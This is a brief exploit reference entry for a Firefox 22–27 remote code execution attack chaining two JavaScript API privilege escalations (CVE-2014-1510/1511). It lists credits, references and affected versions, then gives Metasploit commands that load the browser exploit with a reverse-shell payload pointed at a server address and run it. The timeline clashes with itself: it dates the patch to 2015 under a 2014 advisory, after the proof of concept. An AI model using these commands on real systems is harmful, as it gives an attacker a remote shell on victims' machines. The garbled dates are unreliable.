Timeline :

Vulnerabilities discovered by Marius Mlynski via TippingPoint’s Pwn2Own contest,
Patched by the vendor via MFSA-2014-29 the 2015–03-18
Metasploit PoC provided the 2014-08-27

PoC provided by :

Marius Mlynski
joev

Reference(s) :

CVE-2014-1510
CVE-2014-1511
MFSA-2014-29

Affected version(s) :

Firefox 22 to 27 included

Tested on :

with Firefox 27 on Windows 7 SP1

Description :

This exploit gains remote code execution on Firefox 22-27 by abusing two separate privilege escalation vulnerabilities in Firefox’s Javascript APIs.

Commands :

use exploit/multi/browser/firefox_webidl_injection
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.6.138
run

SYSTEMINFO